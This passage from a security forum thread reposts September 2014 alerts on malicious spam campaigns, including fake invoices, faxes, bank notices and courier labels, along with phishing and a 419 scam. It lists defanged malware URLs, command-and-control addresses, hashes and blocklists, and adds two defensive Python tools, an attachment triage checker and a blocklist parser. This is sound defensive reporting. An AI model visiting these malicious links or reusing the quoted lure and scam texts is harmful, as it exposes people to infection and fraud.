31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231
..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo....spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
    From:     Christie Foley [christie.foley@ badinsky .sk]
    Reply-to:     Christie Foley [christie.foley@ badinsky .sk]
    Date:     16 September 2014 13:55
    Subject:     Unpaid invoice notification ...


Screenshot: https://1.bp.blogspo...600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/...d=1410873578924

- http://myonlinesecur...xploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email -  419 SCAM
- http://myonlinesecur...ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
    Attn:Beneficiary,
     My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
     Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
    you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
    therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
    authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
    Teller Machine System( ATM CARD).
     Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
     Reply also to : fminister88 @gmail .com
     Your faithfully.
     Dr Mrs Ngozi O. Iweala.
    Finance Of Minister.


[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     We have arranged a BACS transfer to your bank for the following amount : 4933.00
    Please find details at our secure link below: ...


This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/

- https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu...ontains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
    We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
    The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
    You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
    If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
    Airway Bill No: 7808130095
    Class: Package Services
    Service(s): Delivery Confirmation
    Status: eNotification sent
    Print this label to get this package at our depot/office.
    Thank you
    © 2014 Copyright© 2013 DHL. All Rights Reserved...


The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1410870424/
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 16 September 2014 - 09:50 AM.

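Several of the lures in the posts above (USPS Label.zip extracting to Label.exe, Homicide-case#15808_pdf.zip extracting to a _pdf.exe, the eFax .scr, the 'inovice' .arj run) rely on two tricks: an executable inside a ZIP whose name and icon imitate a document once Windows hides the real extension, or an archive format that has no business reaching a mailbox. The Python below is an added example, not code from this thread or from the blogs it quotes; it shows the kind of triage check a mail gateway can run over attachments. The sample attachments are constructed in memory (the MZ stub and ARJ bytes are stand-ins, not real malware), and the blocked-archive list is an assumption beyond the single .arj case named above.

```python
import io
import re
import zipfile

# Extensions Windows runs directly; the spoofed-icon lures above all end in one of these.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# Archive formats worth rejecting at the mail perimeter (assumed list; .arj is the one
# the dynamoo post recommends blocking).
BLOCKED_ARCHIVE_EXTS = {".arj", ".ace"}
# An executable whose stem ends in a document token ("..._pdf.exe", "scan.doc.scr") is
# built to look like a document once the real extension is hidden.
DOC_LOOKALIKE = re.compile(r"(?i)(?:^|[ _.\-])(pdf|doc|docx|xls|xlsx|jpg|png|wav)$")


def split_name(name):
    """Return (stem, lowercase extension) for a file name; extension is '' if absent."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return base, ""
    stem, ext = base.rsplit(".", 1)
    return stem, "." + ext.lower()


def check_file(name, head):
    """Reasons one file (top-level or extracted) is suspicious; `head` is its first bytes."""
    reasons = []
    stem, ext = split_name(name)
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}: {name}")
        if DOC_LOOKALIKE.search(stem):
            reasons.append(f"document-lookalike name on executable: {name}")
    elif head[:2] == b"MZ":
        # a PE image renamed to .pdf/.doc still starts with the DOS header magic
        reasons.append(f"PE header under non-executable extension: {name}")
    return reasons


def triage_attachment(name, data):
    """Return the reasons to quarantine an attachment; an empty list means no finding."""
    reasons = []
    _, ext = split_name(name)
    if ext in BLOCKED_ARCHIVE_EXTS:
        reasons.append(f"blocked archive type {ext}: {name}")
    reasons += check_file(name, data[:2])
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                with zf.open(info) as member:
                    reasons += check_file(info.filename, member.read(2))
    return reasons


def zip_with(member_name, payload):
    """Build an in-memory ZIP holding one member (constructed sample, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x00" * 62          # stand-in: only the DOS header magic, not a program
FAKE_ARJ = b"\x60\xea" + b"\x00" * 30   # stand-in: ARJ magic bytes only

# Constructed samples named after the lures quoted in the posts above.
SAMPLES = {
    "Label.zip": zip_with("Label.exe", FAKE_PE),
    "Homicide-case#15808_pdf.zip": zip_with("Homicide-case#15808_pdf.exe", FAKE_PE),
    "fax-id9182719182837529.zip": zip_with("fax-id9182719182837529.scr", FAKE_PE),
    "invoice_8958508.arj": FAKE_ARJ,
    "statement.pdf": b"%PDF-1.4\n% constructed benign sample\n",
}


def triage_all(samples=SAMPLES):
    """Map each sample attachment name to its list of findings."""
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all().items():
        print(f"{name}: {'QUARANTINE' if findings else 'ok'}")
        for finding in findings:
            print("   -", finding)
```

The check reads only the first two bytes of each archive member, so it costs almost nothing per message; a real gateway would also recurse into nested archives and apply the same test to the attachment's declared MIME type.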


#1281 AplusWebMaster

Posted 17 September 2014 - 04:18 AM

FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo....you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
    From:     Fax [fax@ victimdomain .com]
    Date:     17 September 2014 09:32
    Subject:     You've received a new fax
    New fax at SCAN6405035 from EPSON by https ://victimdomain .com
    Scan date: Wed, 17 Sep 2014 16:32:29 +0800
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...
    (Google Disk Drive is a file hosting service operated by Google, Inc.)


The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br
"
* https://www.virustot...sis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/

188.165.204.210: https://www.virustot...10/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecur...ce-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecur...licious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmic...sl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combines the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecur...ast-invoice.png

17 September 2014: Invoice-17009106-001.zip (137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... -same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
    Dear Sir,
    Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
    Thank you,
    Darragh


This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/
 

:ph34r:  <_<


Edited by AplusWebMaster, 17 September 2014 - 12:10 PM.



#1282 AplusWebMaster

Posted 18 September 2014 - 05:31 AM

FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo....voice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     18 September 2014 11:06
    Subject:     Important - New account invoice
      Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here or follow the link below ...
    Thank you for choosing NatWest...


The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk
"
* https://www.virustot...sis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustot...52/information/
188.165.204.210: https://www.virustot...10/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email...
From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
Date:     18 September 2014 11:45
Subject:     Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...


- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecur...unt-invoice.png
___

USAA Phish ...
- https://blog.malware...hing-campaigns/
Sep 18, 2014 - "... phish pages targeting the United Services Automobile Association (USAA), a Fortune 500 financial company that offers banking, investing, and insurance to US Military soldiers and their families. Here is what the fake page looks like:
> https://blog.malware...lt-1024x851.png
... Users are then led to this page:
> https://blog.malware...in-1024x665.png
... Clicking the “Next” button opens this page wherein users can supply their secret questions and their respective answers:
> https://blog.malware...na-1024x789.png
... Clicking “Next” opens the last page, which asks for more information that needs “updating”, including full name and date of birth:
> https://blog.malware...fo-967x1024.png
... Users are then shown the door by redirecting them to the legitimate USAA page one sees when they log out... In case you receive emails claiming to be from USAA, please note that they do -not- send out emails to their clients, or to anyone for that matter, asking for their information. Here is a short list of tips to help you steer clear of USAA phishing attempts:
- Remain aware of phishing cases involving USAA. It’s also good to have their contact details handy in the event of fraud or account compromise.
- The legitimate USAA website, www.usaa.com, is a verified domain. As such, look for the green box beside its URL on the browser address bar. This site also uses SSL encryption, which means that it uses the https protocol, making it safe to access even over public networks.
- Ensure that the anti-phishing feature of your Internet browser is enabled. Do this for your antivirus software as well..."
___

Fake eFax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    INCOMING FAX REPORT
    Date/Time: Thursday, 18.09.2014
    Speed: 353bps
    Connection time: 08:02
    Page: 4
    Resolution: Normal
    Remote ID: 611-748-177946
    Line number: 3
    DTMF/DID:
    Description: Internal only ...


18 September 2014: fax-id9182719182837529.zip (189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Line Voice Message Spam
- http://threattrack.t...ce-message-spam
18 Sep 2014 - "Subjects Seen:
    You have a voice message
Typical e-mail details:
    LINE Notification
    You have a voice message, listen it now.
    Time: 21:12:45 14.10.2014, Duration: 45sec


Malicious URLs:
    iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
    LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
    LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)


Screenshot: https://gs1.wac.edge...Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustot...24/information/
___

Chinese hacked U.S. military contractors ...
- http://www.reuters.c...N0HC1TA20140918
Sep 18, 2014 - "Hacks associated with the Chinese government have repeatedly infiltrated the computer systems of U.S. airlines, technology companies and other contractors involved in the movement of U.S. troops and military equipment, a U.S. Senate panel has found. The Senate Armed Services Committee's year-long probe, concluded in March but made public on Wednesday, found the military's U.S. Transportation Command, or Transcom, was aware of only two out of at least -20- such cyber intrusions within a single year. The investigation also found gaps in reporting requirements and a lack of information sharing among U.S. government entities. That in turn left the U.S. military largely unaware of computer compromises of its contractors..."
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 18 September 2014 - 02:04 PM.

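The "Recommended blocklist" and phone-home lines in the posts above are deliberately defanged (a space before the dot, a [donotclick] prefix, ports and paths left on), which is the right thing for a forum and the wrong thing to paste into a firewall or DNS blocklist. The Python below is an added example, not code from this thread or from the quoted blogs: it refangs a pasted block of indicators, reduces each URL or host:port to its host, validates it as either an IP address or a host name, and separates the two so each can go to the control that understands it. The sample block is built from the indicator lines quoted in the posts above; the host-name pattern is a loose shape check, not a full RFC validation.

```python
import ipaddress
import re

# The thread defangs indicators with a space before each dot and a [donotclick] prefix.
DEFANGED_DOT = re.compile(r"\s+\.")
NOISE = re.compile(r"\[donotclick\]|h(?:xx|tt)ps?\s*://", re.I)
# Loose host-name shape: one or more labels, then an alphabetic TLD (assumed, not RFC-complete).
HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$", re.I)


def refang(token):
    """Undo the defanging and reduce a URL, e-mail address or host:port to its host or IP."""
    t = NOISE.sub("", token.strip())
    t = DEFANGED_DOT.sub(".", t)
    t = t.replace("@ ", "@").split("@")[-1]        # keep only the domain of a mailbox
    t = re.split(r"[\s/:]", t, maxsplit=1)[0]      # drop :port, /path and trailing text
    return t.strip("()<>\"'.,").lower()


def parse_blocklist(text):
    """Split a pasted indicator block into validated IPs, host names and rejected lines."""
    ips, domains, rejected = set(), set(), []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "*", "...")):
            continue
        # "hallerindia .com (192.185.97.223)" carries a host and its IP on one line
        for piece in re.split(r"[()]", line):
            indicator = refang(piece)
            if not indicator:
                continue
            try:
                ips.add(str(ipaddress.ip_address(indicator)))
                continue
            except ValueError:
                pass
            if HOST_RE.match(indicator):
                domains.add(indicator)
            else:
                rejected.append(piece.strip())
    return {
        "ips": sorted(ips, key=ipaddress.ip_address),
        "domains": sorted(domains),
        "rejected": rejected,
    }


# Constructed from the defanged lines quoted in the posts above, including a header line
# and path/port variants to show what the parser tolerates and what it rejects.
SAMPLE_BLOCKLIST = """
Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua/twndcrfbru/zjliqkgppi.js
www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip
ngujungwap .mobi.ps
[donotclick]108.174.58.239:8080 /wn8omxftff
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
hallerindia .com (192.185.97.223)
"""

if __name__ == "__main__":
    result = parse_blocklist(SAMPLE_BLOCKLIST)
    print("# IPs for the firewall");      print("\n".join(result["ips"]))
    print("# hosts for DNS filtering");   print("\n".join(result["domains"]))
    print("# not parsed:", result["rejected"])
```

Keeping a "rejected" list matters in practice: a line that silently drops out of a blocklist is worse than a parse error, because nobody notices the missing indicator until the next infection.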


#1283 AplusWebMaster

Posted 19 September 2014 - 06:11 AM

FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo....e-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
    From:     Microsoft Outlook [no-reply@ victimdomain .com]
    Date:     19 September 2014 11:59
    Subject:     You have received a voice mail
    You received a voice mail : VOICE976-588-6749.wav (25 KB)
    Caller-Id: 976-588-6749
    Message-Id: D566Y5
    Email-Id: <REDACTED>
    Download and extract to listen the message.
    We have uploaded voicemail report on dropbox, please use the following link to download your file...
    Sent by Microsoft Exchange Server


The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo....-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspo...600/natwest.png

192.185.97.223: https://www.virustot...23/information/

- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecur...t-statement.png
Current Virus total detections: 1/54*
* https://www.virustot...sis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: London City Police
    Sending Location: GB – London – London City Police
    Bulletin Case#: 14-62597
    Bulletin Author: BARILLAS #1169
    Sending User #: 92856
    APBnet Version: 684593
    The bulletin is a pdf attachment to this email.
    The Adobe Reader (from Adobe .com) will display and print the bulletin best.
    You can Not reply to the bulletin by clicking on the Reply button in your email software.


Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip: Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     TNT COURIER SERVICE (TCS)
    Customer/Delivery Services Department
    Central Pk Est/Mosley Rd, Trafford Park
    Manchester, M17 1TT UK.
    DETAILS OF PACKAGE
    Reg order no: 460911612900
    Your package have been picked up and is ready for dispatch.
    Connote #           :               460911612900
    Service Type      :               Export Non Documents – Intl
    Shipped on         :               18 Sep 14 12:00
    Order No                    :       4240629
    Status          :       Driver’s Return
    Description     :      Wrong Address
    Service Options: You are required to select a service option below.
    The options, together with their associated conditions.
    Please check attachment to view information about the sender and package.


19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.c...N0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu...l?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer.  If you need help, please visit the Apple Support.
Apple Client Support.


A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.../2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn...licious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn...licious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 20 September 2014 - 04:35 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1284 AplusWebMaster

Posted 22 September 2014 - 05:58 AM

FYI...

Fake gov't SPAM
- http://blog.dynamoo....ssion-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspo...600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustot...sis/1411383282/

184.168.152.32: https://www.virustot...32/information/

** https://anubis.isecl...f82&format=html

- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecur...-Submission.png
...
> https://www.virustot...sis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecur...update-malware/
22 Sep 2014 - "'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Dear client,
    We are pleased to announce that LogMeIn has released a new security certificate.
    It contains new features:
    •    The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
    •    Any irregular activity on your account will be detected by our security department
    •       This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
    Download the attached certificate. Update will be automatically installed by double click.
    As always, your Logmein Support Team is happy to assist with any questions you may have.
    Feel free to contact us ...


22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411400614/

- https://isc.sans.edu...l?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu...11_34_06 AM.png
...
> https://www.virustot...b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
___

Fake USAA SPAM - PDF malware
- http://myonlinesecur...ds-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecur...to-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
